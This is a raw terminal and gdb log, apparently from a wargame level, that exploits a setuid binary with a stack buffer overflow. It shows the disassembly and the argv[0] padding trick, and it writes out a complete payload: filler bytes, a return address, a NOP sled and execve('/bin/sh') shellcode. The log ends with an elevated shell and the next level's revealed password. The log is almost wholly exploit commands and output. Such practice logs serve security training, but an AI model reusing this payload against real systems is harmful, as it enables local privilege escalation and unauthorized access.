0x8048529 <main+41>:    call   0x80483f0 <strlen>
0x804852e <main+46>:    add    $0x4,%esp
0x8048531 <main+49>:    mov    %eax,%eax
0x8048533 <main+51>:    cmp    $0x4d,%eax
0x8048536 <main+54>:    je     0x8048550 <main+80>
0x8048538 <main+56>:    push   $0x804869c
0x804853d <main+61>:    call   0x8048410 <printf>
0x8048542 <main+66>:    add    $0x4,%esp
0x8048545 <main+69>:    push   $0x0
0x8048547 <main+71>:    call   0x8048420 <exit>
0x804854c <main+76>:    add    $0x4,%esp
0x804854f <main+79>:    nop
0x8048550 <main+80>:    nop
0x8048551 <main+81>:    movl   $0x0,0xffffffd4(%ebp)
0x8048558 <main+88>:    mov    0xffffffd4(%ebp),%eax
0x804855b <main+91>:    lea    0x0(,%eax,4),%edx
0x8048562 <main+98>:    mov    0x80497d4,%eax
0x8048567 <main+103>:   cmpl   $0x0,(%eax,%edx,1)
0x804856b <main+107>:   jne    0x8048570 <main+112>
0x804856d <main+109>:   jmp    0x80485b0 <main+176>
0x804856f <main+111>:   nop
0x8048570 <main+112>:   mov    0xffffffd4(%ebp),%eax
0x8048573 <main+115>:   lea    0x0(,%eax,4),%edx
0x804857a <main+122>:   mov    0x80497d4,%eax
0x804857f <main+127>:   mov    (%eax,%edx,1),%edx
0x8048582 <main+130>:   push   %edx
0x8048583 <main+131>:   call   0x80483f0 <strlen>
0x8048588 <main+136>:   add    $0x4,%esp
0x804858b <main+139>:   mov    %eax,%eax
0x804858d <main+141>:   push   %eax
0x804858e <main+142>:   push   $0x0
0x8048590 <main+144>:   mov    0xffffffd4(%ebp),%eax
0x8048593 <main+147>:   lea    0x0(,%eax,4),%edx
0x804859a <main+154>:   mov    0x80497d4,%eax
0x804859f <main+159>:   mov    (%eax,%edx,1),%edx
0x80485a2 <main+162>:   push   %edx
---Type <return> to continue, or q <return> to quit---
0x80485a3 <main+163>:   call   0x8048430 <memset>
0x80485a8 <main+168>:   add    $0xc,%esp
0x80485ab <main+171>:   incl   0xffffffd4(%ebp)
0x80485ae <main+174>:   jmp    0x8048558 <main+88>
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   add    $0x2f,%edx
0x80485bb <main+187>:   cmpb   $0xbf,(%edx)
0x80485be <main+190>:   je     0x80485d7 <main+215>
0x80485c0 <main+192>:   push   $0x80486ab
0x80485c5 <main+197>:   call   0x8048410 <printf>
0x80485ca <main+202>:   add    $0x4,%esp
0x80485cd <main+205>:   push   $0x0
0x80485cf <main+207>:   call   0x8048420 <exit>
0x80485d4 <main+212>:   add    $0x4,%esp
0x80485d7 <main+215>:   mov    0xc(%ebp),%eax
0x80485da <main+218>:   add    $0x4,%eax
0x80485dd <main+221>:   mov    (%eax),%edx
0x80485df <main+223>:   push   %edx
0x80485e0 <main+224>:   call   0x80483f0 <strlen>
0x80485e5 <main+229>:   add    $0x4,%esp
0x80485e8 <main+232>:   mov    %eax,%eax
0x80485ea <main+234>:   cmp    $0x30,%eax
0x80485ed <main+237>:   jbe    0x8048606 <main+262>
0x80485ef <main+239>:   push   $0x80486c8
0x80485f4 <main+244>:   call   0x8048410 <printf>
0x80485f9 <main+249>:   add    $0x4,%esp
0x80485fc <main+252>:   push   $0x0
0x80485fe <main+254>:   call   0x8048420 <exit>
0x8048603 <main+259>:   add    $0x4,%esp
0x8048606 <main+262>:   mov    0xc(%ebp),%eax
0x8048609 <main+265>:   add    $0x4,%eax
0x804860c <main+268>:   mov    (%eax),%edx
0x804860e <main+270>:   push   %edx
0x804860f <main+271>:   lea    0xffffffd8(%ebp),%eax
0x8048612 <main+274>:   push   %eax
0x8048613 <main+275>:   call   0x8048440 <strcpy>
0x8048618 <main+280>:   add    $0x8,%esp
0x804861b <main+283>:   lea    0xffffffd8(%ebp),%eax
0x804861e <main+286>:   push   %eax
0x804861f <main+287>:   push   $0x80486df
0x8048624 <main+292>:   call   0x8048410 <printf>
0x8048629 <main+297>:   add    $0x8,%esp
0x804862c <main+300>:   push   $0x28
0x804862e <main+302>:   push   $0x0
0x8048630 <main+304>:   lea    0xffffffd8(%ebp),%eax
0x8048633 <main+307>:   push   %eax
0x8048634 <main+308>:   call   0x8048430 <memset>
0x8048639 <main+313>:   add    $0xc,%esp
0x804863c <main+316>:   leave
---Type <return> to continue, or q <return> to quit---
0x804863d <main+317>:   ret
0x804863e <main+318>:   nop
0x804863f <main+319>:   nop
End of assembler dump.
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaaa
Starting program: /home/darkelf/tmp///////////////////////////////////////////////////////orge aaaa
argv[0] error

Program exited normally.
(gdb) Quit
(gdb) q
[darkelf@localhost tmp]$ ls
orge  test  test.c
[darkelf@localhost tmp]$ vi test.c
[darkelf@localhost tmp]$ gcc -o test test.c
[darkelf@localhost tmp]$ ./test
76[darkelf@localhost tmp]$ gdb -q /home/darkelf/tmp////////////////////////////////////////////////////////orge
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaa
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge aaa
stack is still your friend.

Program exited normally.
(gdb) `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Undefined command: "".  Try "help".
(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿

Breakpoint 1, 0x804863d in main ()
(gdb) x/100x $esp
0xbffff96c:     0xbfbffd6c      0x00000000      0xbffff9b4      0xbffff9c4
0xbffff97c:     0x40013868      0x00000003      0x08048450      0x00000000
0xbffff98c:     0x08048471      0x08048500      0x00000003      0xbffff9b4
0xbffff99c:     0x08048390      0x0804866c      0x4000ae60      0xbffff9ac
0xbffff9ac:     0x40013e90      0x00000003      0xbffffaaa      0xbffffaf8
0xbffff9bc:     0xbffffb29      0x00000000      0xbffffc6e      0xbffffc90
0xbffff9cc:     0xbffffc9a      0xbffffca8      0xbffffcc7      0xbffffcd7
0xbffff9dc:     0xbffffcee      0xbffffd0b      0xbffffd16      0xbffffd24
0xbffff9ec:     0xbffffd67      0xbffffd7a      0xbffffd8f      0xbffffd9f
0xbffff9fc:     0xbffffdac      0xbffffdcb      0xbffffdd6      0xbffffde3
0xbffffa0c:     0xbffffdeb      0x00000000      0x00000003      0x08048034
0xbffffa1c:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffa2c:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffa3c:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffffa4c:     0x0000000b      0x000001fa      0x0000000c      0x000001fa
0xbffffa5c:     0x0000000d      0x000001fa      0x0000000e      0x000001fa
0xbffffa6c:     0x00000010      0x0febfbff      0x0000000f      0xbffffaa5
0xbffffa7c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa8c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa9c:     0x00000000      0x00000000      0x38366900      0x682f0036
0xbffffaac:     0x2f656d6f      0x6b726164      0x2f666c65      0x2f706d74
0xbffffabc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffacc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffadc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffaec:     0x2f2f2f2f      0x6f2f2f2f      0x00656772      0xbfbfbfbf
(gdb)
0xbffffafc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb0c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb1c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbffd6c      0x90909000
0xbffffb2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc4c:     0x90909090      0x90909090      0x50c03190      0x732f2f68
0xbffffc5c:     0x622f6868      0xe3896e69      0xe1895350      0xcd0bb099
0xbffffc6c:     0x00000080      0x00000000      0x00000000      0x00000000
0xbffffc7c:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) Quit
(gdb) q
The program is running.  Exit anyway? (y or n) y
[darkelf@localhost tmp]$ ./home/darkelf/tmp/////////////////////////////////////
bash: ./home/darkelf/tmp///////////////////////////////////////////////////////o
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
stack is still your friend.
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////                                                                                                                     //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python                                                                                                                      -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x                                                                                                                     e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œû
Illegal instruction (core dumped)
[darkelf@localhost tmp]$ bash2
[darkelf@localhost tmp]$ `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `pytho                                                                                                                     n -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89                                                                                                                     \xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bash2: ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿: command not found
[darkelf@localhost tmp]$
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////                                                                                                                     //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python                                                                                                                      -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x                                                                                                                     e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) groups=506(darkelf)
bash$ exit
exit
[darkelf@localhost tmp]$ cd ../
[darkelf@localhost darkelf]$ .//////////////////////////////////////////////////                                                                                                                     //////////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `pyt                                                                                                                     hon -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x                                                                                                                     89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darke                                                                                                                     lf)
bash$ whoami
orge
bash$ my-pass
euid = 507
timewalker
bash$
bash$

